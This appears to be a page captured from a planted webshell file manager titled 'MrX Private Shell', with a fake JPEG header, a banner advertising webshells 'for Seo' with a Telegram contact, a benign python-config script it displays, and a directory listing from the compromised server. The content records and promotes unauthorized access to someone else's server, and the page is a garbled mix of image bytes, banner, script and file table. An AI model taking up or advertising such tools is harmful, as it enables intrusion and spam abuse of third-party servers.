����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
# Keep this script in sync with python-config.in
exit_with_usage ()
{
echo "Usage: $0 --prefix|--exec-prefix|--includes|--libs|--cflags|--ldflags|--extension-suffix|--help|--abiflags|--configdir"
exit $1
}
if [ "$1" = "" ] ; then
exit_with_usage 1
fi
# Returns the actual prefix where this script was installed to.
installed_prefix ()
{
RESULT=$(dirname $(cd $(dirname "$1") && pwd -P))
if which readlink >/dev/null 2>&1 ; then
if readlink -f "$RESULT" >/dev/null 2>&1; then
RESULT=$(readlink -f "$RESULT")
fi
fi
echo $RESULT
}
prefix_real=$(installed_prefix "$0")
# Use sed to fix paths from their built-to locations to their installed-to
# locations. Keep prefix & exec_prefix using their original values in case
# they are referenced in other configure variables, to prevent double
# substitution, issue #22140.
prefix="/usr"
exec_prefix="/usr"
exec_prefix_real=${prefix_real}
includedir=$(echo "/usr/include" | sed "s#$prefix#$prefix_real#")
libdir=$(echo "/usr/lib64" | sed "s#$prefix#$prefix_real#")
CFLAGS=$(echo " -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -D_GNU_SOURCE -fPIC -fwrapv " | sed "s#$prefix#$prefix_real#")
VERSION="3.6"
LIBM="-lm"
LIBC=""
SYSLIBS="$LIBM $LIBC"
ABIFLAGS="m"
LIBS="-lpython${VERSION}${ABIFLAGS} -lpthread -ldl -lutil $SYSLIBS"
BASECFLAGS=" -Wno-unused-result -Wsign-compare"
LDLIBRARY="libpython${LDVERSION}.so"
LINKFORSHARED="-Xlinker -export-dynamic"
OPT="-DDYNAMIC_ANNOTATIONS_ENABLED=1 -DNDEBUG -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -D_GNU_SOURCE -fPIC -fwrapv"
PY_ENABLE_SHARED="1"
LDVERSION="${VERSION}${ABIFLAGS}"
LIBDEST=${prefix_real}/lib/python${VERSION}
LIBPL=$(echo "${prefix}/lib64/python3.6/config-${VERSION}${ABIFLAGS}-x86_64-linux-gnu" | sed "s#$prefix#$prefix_real#")
SO=".cpython-36m-x86_64-linux-gnu.so"
PYTHONFRAMEWORK=""
INCDIR="-I$includedir/python${VERSION}${ABIFLAGS}"
PLATINCDIR="-I$includedir/python${VERSION}${ABIFLAGS}"
# Scan for --help or unknown argument.
for ARG in $*
do
case $ARG in
--help)
exit_with_usage 0
;;
--prefix|--exec-prefix|--includes|--libs|--cflags|--ldflags|--extension-suffix|--abiflags|--configdir)
;;
*)
exit_with_usage 1
;;
esac
done
for ARG in "$@"
do
case "$ARG" in
--prefix)
echo "$prefix_real"
;;
--exec-prefix)
echo "$exec_prefix_real"
;;
--includes)
echo "$INCDIR $PLATINCDIR"
;;
--cflags)
echo "$INCDIR $PLATINCDIR $BASECFLAGS $CFLAGS $OPT"
;;
--libs)
echo "$LIBS"
;;
--ldflags)
LINKFORSHAREDUSED=
if [ -z "$PYTHONFRAMEWORK" ] ; then
LINKFORSHAREDUSED=$LINKFORSHARED
fi
LIBPLUSED=
if [ "$PY_ENABLE_SHARED" = "0" ] ; then
LIBPLUSED="-L$LIBPL"
fi
echo "$LIBPLUSED -L$libdir $LIBS $LINKFORSHAREDUSED"
;;
--extension-suffix)
echo "$SO"
;;
--abiflags)
echo "$ABIFLAGS"
;;
--configdir)
echo "$LIBPL"
;;
esac
done
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| awk | Folder | 0755 |
|
|
| coreutils | Folder | 0755 |
|
|
| cpanel-pdns | Folder | 0755 |
|
|
| dbus-1 | Folder | 0755 |
|
|
| dovecot | Folder | 0755 |
|
|
| fwupd | Folder | 0755 |
|
|
| gawk | Folder | 0755 |
|
|
| gcc | Folder | 0755 |
|
|
| getconf | Folder | 0755 |
|
|
| grubby | Folder | 0755 |
|
|
| hostname | Folder | 0755 |
|
|
| imunify-notifier | Folder | 0755 |
|
|
| initscripts | Folder | 0755 |
|
|
| installkernel | Folder | 0755 |
|
|
| linux-boot-probes | Folder | 0755 |
|
|
| man-db | Folder | 0755 |
|
|
| microcode_ctl | Folder | 0755 |
|
|
| nfs-utils | Folder | 0755 |
|
|
| openldap | Folder | 0755 |
|
|
| openssh | Folder | 0755 |
|
|
| os-prober | Folder | 0755 |
|
|
| os-probes | Folder | 0755 |
|
|
| p11-kit | Folder | 0755 |
|
|
| plymouth | Folder | 0755 |
|
|
| selinux | Folder | 0755 |
|
|
| smartmontools | Folder | 0755 |
|
|
| sssd | Folder | 0755 |
|
|
| sudo | Folder | 0755 |
|
|
| tuned | Folder | 0755 |
|
|
| udisks2 | Folder | 0755 |
|
|
| utempter | Folder | 0755 |
|
|
| audit-functions | File | 990 B | 0750 |
|
| dirmngr_ldap | File | 87.33 KB | 0755 |
|
| dnf-utils | File | 3.62 KB | 0755 |
|
| ebtables | File | 1.33 KB | 0755 |
|
| exim.daemon | File | 758 B | 0755 |
|
| generate-rndc-key.sh | File | 546 B | 0755 |
|
| gpg-check-pattern | File | 111.91 KB | 0755 |
|
| gpg-preset-passphrase | File | 87.23 KB | 0755 |
|
| gpg-protect-tool | File | 206.38 KB | 0755 |
|
| gpg-wks-client | File | 227.23 KB | 0755 |
|
| grepconf.sh | File | 253 B | 0755 |
|
| import-state | File | 1.03 KB | 0755 |
|
| imunify-message-gateway | File | 7.95 MB | 0755 |
|
| loadmodules | File | 233 B | 0755 |
|
| nfsrahead | File | 37.15 KB | 0755 |
|
| nm-daemon-helper | File | 12.6 KB | 0755 |
|
| nm-dhcp-helper | File | 16.2 KB | 0755 |
|
| nm-dispatcher | File | 66.16 KB | 0755 |
|
| nm-initrd-generator | File | 740.48 KB | 0755 |
|
| no-python | File | 157 B | 0755 |
|
| platform-python | File | 11.59 KB | 0755 |
|
| platform-python-config | File | 204 B | 0755 |
|
| platform-python3.6 | File | 11.59 KB | 0755 |
|
| platform-python3.6-config | File | 204 B | 0755 |
|
| platform-python3.6m | File | 11.59 KB | 0755 |
|
| platform-python3.6m-config | File | 204 B | 0755 |
|
| platform-python3.6m-x86_64-config | File | 3.54 KB | 0755 |
|
| report-command-error | File | 8.37 MB | 0755 |
|
| run-with-intensity | File | 6.36 MB | 0755 |
|
| scdaemon | File | 442.41 KB | 0755 |
|
| virt-what-cpuid-helper | File | 7.91 KB | 0755 |
|
| xb-tool | File | 24.78 KB | 0755 |
|